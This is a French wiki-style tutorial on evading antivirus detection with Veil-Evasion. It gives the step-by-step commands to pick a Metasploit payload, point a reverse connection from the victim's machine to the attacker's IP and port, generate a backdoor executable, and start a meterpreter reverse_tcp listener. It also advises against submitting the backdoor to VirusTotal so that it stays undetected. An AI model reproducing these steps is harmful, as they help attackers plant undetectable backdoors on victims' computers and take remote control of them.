**Bypass d'antivirus avec Veil Evasion**

**1.Presentation**

Un antivirus est un logiciel qui a pour but de détecter et d'éradiquer les virus présents dans votre ordinateur, et de prendre des mesures pour les empêcher de nuire.
Il peux fonctionner de plusieurs manières différentes mais les méthodes les plus utilisés sont la détection de signature et l'analyse comportemental.


**2.Exploitation**

Pour passer à travers les mécanismes de sécurité il faut réencoder le payload (si celui-ci est detecté)

Metasploit fournit un certain nombre d'encoder type shikata_ga_nai ou encore bloxor.

Aujourd'hui ils sont rapidement détecté par les antivirus.

Pour contourner ce problème Veil-evasion est apparu.

Vous pouvez le télécharger [[https://github.com/Veil-Framework/Veil-Evasion | ici]]


__2.1 Méthode 1 : Utilisation de Veil-evasion__

{{ :metasploit:veil1.png?nolink |}}

Veil-evasion embarque à l'heure actuel 51 payloads de metasploit

Vous pouvez les lister en tappant : <code> list </code>

{{ :metasploit:veil2.png?nolink |}}

On choisit par exemple le payload 6.

<code> use 6 </code>

{{ :metasploit:veil3.png?nolink |}}

Il faut définir les options :

<code>
set LHOST 192.168.1.5 
set LPORT 4444
</code>

où LHOST est mon ip et LPORT est le port sur laquelle la machine victime va initier la connexion vers mon ordinateur.

Une fois toutes les options définis : 
<code> generate </code>

{{ :metasploit:veil4.png?nolink |}}

On définit le nom de notre backdoor.

{{ :metasploit:veil5.png?nolink |}}

Veil nous affiche le chemin pour récupérer notre executable ainsi que le Handler File contenant les commandes à tapper dans msfconsole pour mettre en place le listener.

<code>

cat /usr/share/veil-output/handlers/ark1nar_handler.rc

use exploit/multi/handler           //permet d'utilier le listener
set PAYLOAD windows/meterpreter/reverse_tcp  //permet de définir le payload à injecter lors de la connexion
set LHOST 192.168.1.5            //ip attaquant
set LPORT 4444                   //port écoute attaquant
set ExitOnSession false          //Ne pas couper le listener si une session est créée
exploit -j  // Executer le listener en fonds de tache


</code>

**SURTOUT SURTOUT NE TESTER PAS VOTRE BACKDOOR SUR UN SERVICE DE TEST VIRAL EN LIGNE TEL QUE VIRUS TOTAL OU AUTRE**
Vous ne feriez que gacher le travail de toute une communauté.